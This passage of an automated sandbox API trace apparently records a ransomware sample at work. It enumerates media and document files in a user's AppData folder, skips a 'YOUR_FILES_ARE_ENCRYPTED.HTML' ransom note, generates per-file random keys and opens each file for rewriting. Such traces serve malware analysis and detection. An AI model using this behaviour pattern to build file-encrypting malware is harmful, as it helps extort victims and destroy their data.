param_2="%02X" | out: param_1="B0") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="D6") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="CB") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="9A") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="AE") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="9A") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="B8") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="E9") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="00") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="01") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="E5") returned 2 [0164.869] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="32") returned 2 [0164.870] lstrcpyW (in: lpString1=0x74d20bc, 
lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\3lBzAWDiAW5xAw.docx" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\3lBzAWDiAW5xAw.docx") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\3lBzAWDiAW5xAw.docx" [0164.870] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.870] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0164.880] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa9fcde60, ftCreationTime.dwHighDateTime=0x1d7dabb, ftLastAccessTime.dwLowDateTime=0x8b71df30, ftLastAccessTime.dwHighDateTime=0x1d7e502, ftLastWriteTime.dwLowDateTime=0x8b71df30, ftLastWriteTime.dwHighDateTime=0x1d7e502, nFileSizeHigh=0x0, nFileSizeLow=0x117b1, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="4r9qEg53tKJmZlc.mp3", cAlternateFileName="4R9QEG~1.MP3")) returned 1 [0164.881] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\4r9qEg53tKJmZlc.mp3") returned 59 [0164.881] lstrcmpW (lpString1="4r9qEg53tKJmZlc.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.881] PathFindExtensionW (pszPath="4r9qEg53tKJmZlc.mp3") returned=".mp3" [0164.881] lstrlenW (lpString=".mp3") returned 4 [0164.881] PathFindExtensionW (pszPath="4r9qEg53tKJmZlc.mp3") returned=".mp3" [0164.881] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0164.881] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\4r9qEg53tKJmZlc.mp3" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\4r9qeg53tkjmzlc.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0164.881] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=71601) returned 1 [0164.881] GetProcessHeap () returned 0x270000 [0164.882] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0164.882] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="B2") returned 2 [0164.882] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="72") returned 2 [0164.882] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="3C") returned 2 [0164.882] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="F9") returned 2 [0164.882] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="88") returned 2 [0164.882] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="99") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="FC") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="98") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="DF") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="1D") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="D5") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="D8") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="D0") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="96") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="3C") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="55") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="3B") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="33") returned 
2 [0164.883] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="7A") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="8F") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="F4") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="CA") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="28") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="DD") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="38") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="BD") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="1B") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="FA") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="D1") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="BA") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="E6") returned 2 [0164.883] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="7B") returned 2 [0164.884] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\4r9qEg53tKJmZlc.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\4r9qEg53tKJmZlc.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\4r9qEg53tKJmZlc.mp3" [0164.884] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.884] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0164.897] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: 
lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x8dbaf8b0, ftCreationTime.dwHighDateTime=0x1d7e0cc, ftLastAccessTime.dwLowDateTime=0x835594e0, ftLastAccessTime.dwHighDateTime=0x1d7e638, ftLastWriteTime.dwLowDateTime=0x835594e0, ftLastWriteTime.dwHighDateTime=0x1d7e638, nFileSizeHigh=0x0, nFileSizeLow=0x153be, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="6KGcivaX3av8lNTw.mp3", cAlternateFileName="6KGCIV~1.MP3")) returned 1 [0164.897] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\6KGcivaX3av8lNTw.mp3") returned 60 [0164.897] lstrcmpW (lpString1="6KGcivaX3av8lNTw.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.897] PathFindExtensionW (pszPath="6KGcivaX3av8lNTw.mp3") returned=".mp3" [0164.897] lstrlenW (lpString=".mp3") returned 4 [0164.897] PathFindExtensionW (pszPath="6KGcivaX3av8lNTw.mp3") returned=".mp3" [0164.897] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0164.897] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\6KGcivaX3av8lNTw.mp3" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\6kgcivax3av8lntw.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0164.898] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=86974) returned 1 [0164.898] GetProcessHeap () returned 0x270000 [0164.898] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0164.899] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="F7") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="55") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="72") returned 2 [0164.899] wsprintfW (in: 
param_1=0x4ebda42, param_2="%02X" | out: param_1="D5") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="01") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="5D") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="96") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="60") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="32") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="05") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="1A") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="CC") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="D0") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="91") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="DA") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="0A") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="D7") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="A7") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="A6") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="30") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="3C") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="1C") returned 2 [0164.899] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="C5") returned 2 [0164.900] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="F2") returned 2 [0164.900] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="49") returned 2 
[0164.900] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="D8") returned 2 [0164.900] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="D2") returned 2 [0164.900] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="85") returned 2 [0164.900] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="F1") returned 2 [0164.900] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="9C") returned 2 [0164.900] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="F9") returned 2 [0164.900] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="41") returned 2 [0164.901] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\6KGcivaX3av8lNTw.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\6KGcivaX3av8lNTw.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\6KGcivaX3av8lNTw.mp3" [0164.901] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.901] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0164.918] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3d67b160, ftCreationTime.dwHighDateTime=0x1d7df81, ftLastAccessTime.dwLowDateTime=0x5c648d50, ftLastAccessTime.dwHighDateTime=0x1d7df8f, ftLastWriteTime.dwLowDateTime=0x5c648d50, ftLastWriteTime.dwHighDateTime=0x1d7df8f, nFileSizeHigh=0x0, nFileSizeLow=0x60e, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="9evL6_piVJixL3I.wav", cAlternateFileName="9EVL6_~1.WAV")) returned 1 [0164.918] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\9evL6_piVJixL3I.wav") returned 59 [0164.918] lstrcmpW 
(lpString1="9evL6_piVJixL3I.wav", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.918] PathFindExtensionW (pszPath="9evL6_piVJixL3I.wav") returned=".wav" [0164.918] lstrlenW (lpString=".wav") returned 4 [0164.918] PathFindExtensionW (pszPath="9evL6_piVJixL3I.wav") returned=".wav" [0164.918] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0164.918] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\9evL6_piVJixL3I.wav" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\9evl6_pivjixl3i.wav"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0164.919] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=1550) returned 1 [0164.919] GetProcessHeap () returned 0x270000 [0164.919] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0164.920] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="50") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="1C") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="4E") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="F0") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="A4") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="D0") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="43") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="9F") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="4C") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="DB") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | 
out: param_1="1B") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="52") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="9E") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="D2") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="06") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="5A") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="CF") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="42") returned 2 [0164.920] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="5C") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="20") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="94") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="01") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="06") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="A6") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="A5") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="EB") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="8E") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="3F") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="E8") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="46") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="35") returned 2 [0164.921] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="24") returned 2 [0164.922] lstrcpyW (in: 
lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\9evL6_piVJixL3I.wav" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\9evL6_piVJixL3I.wav") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\9evL6_piVJixL3I.wav" [0164.922] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.922] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0164.944] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd57ba1b0, ftCreationTime.dwHighDateTime=0x1d7e133, ftLastAccessTime.dwLowDateTime=0x73f6a0d0, ftLastAccessTime.dwHighDateTime=0x1d7e556, ftLastWriteTime.dwLowDateTime=0x73f6a0d0, ftLastWriteTime.dwHighDateTime=0x1d7e556, nFileSizeHigh=0x0, nFileSizeLow=0x237d, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="Ahtk.mp3", cAlternateFileName="")) returned 1 [0164.944] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ahtk.mp3") returned 48 [0164.944] lstrcmpW (lpString1="Ahtk.mp3", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.944] PathFindExtensionW (pszPath="Ahtk.mp3") returned=".mp3" [0164.944] lstrlenW (lpString=".mp3") returned 4 [0164.944] PathFindExtensionW (pszPath="Ahtk.mp3") returned=".mp3" [0164.944] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0164.944] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ahtk.mp3" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\ahtk.mp3"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 
[0164.945] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=9085) returned 1 [0164.945] GetProcessHeap () returned 0x270000 [0164.945] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0164.946] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="0E") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="45") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="E3") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="19") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="18") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="F2") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="26") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="F3") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="ED") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="F1") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="9A") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="8E") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="05") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="90") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="1A") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="F0") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="7C") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="08") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="E1") returned 2 
[0164.946] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="35") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="E3") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="4B") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="2A") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="35") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="F1") returned 2 [0164.946] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="FA") returned 2 [0164.947] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="AB") returned 2 [0164.947] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="14") returned 2 [0164.947] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="68") returned 2 [0164.947] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="B3") returned 2 [0164.947] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="8F") returned 2 [0164.947] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="1A") returned 2 [0164.947] lstrcpyW (in: lpString1=0x74d20bc, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ahtk.mp3" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ahtk.mp3") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\Ahtk.mp3" [0164.947] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74c2008, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0164.947] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74c2008, lpOverlapped=0x74c2008) returned 1 [0164.959] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3eeac6d0, ftCreationTime.dwHighDateTime=0x1d7e643, 
ftLastAccessTime.dwLowDateTime=0xbfaa4210, ftLastAccessTime.dwHighDateTime=0x1d7e782, ftLastWriteTime.dwLowDateTime=0xbfaa4210, ftLastWriteTime.dwHighDateTime=0x1d7e782, nFileSizeHigh=0x0, nFileSizeLow=0x53ec, dwReserved0=0xa0000003, dwReserved1=0x60, cFileName="atQPmg.avi", cAlternateFileName="")) returned 1 [0164.959] wnsprintfW (in: pszDest=0x75e0048, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\atQPmg.avi") returned 50 [0164.959] lstrcmpW (lpString1="atQPmg.avi", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0164.959] PathFindExtensionW (pszPath="atQPmg.avi") returned=".avi" [0164.959] lstrlenW (lpString=".avi") returned 4 [0164.959] PathFindExtensionW (pszPath="atQPmg.avi") returned=".avi" [0164.959] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0164.959] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Roaming\\atQPmg.avi" (normalized: "c:\\users\\5alr3u30d3\\appdata\\roaming\\atqpmg.avi"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0164.960] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=21484) returned 1 [0164.960] GetProcessHeap () returned 0x270000 [0164.960] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74c2008 [0164.961] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="27") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="BC") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="C0") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="05") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="5D") returned 2 [0164.961] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: 
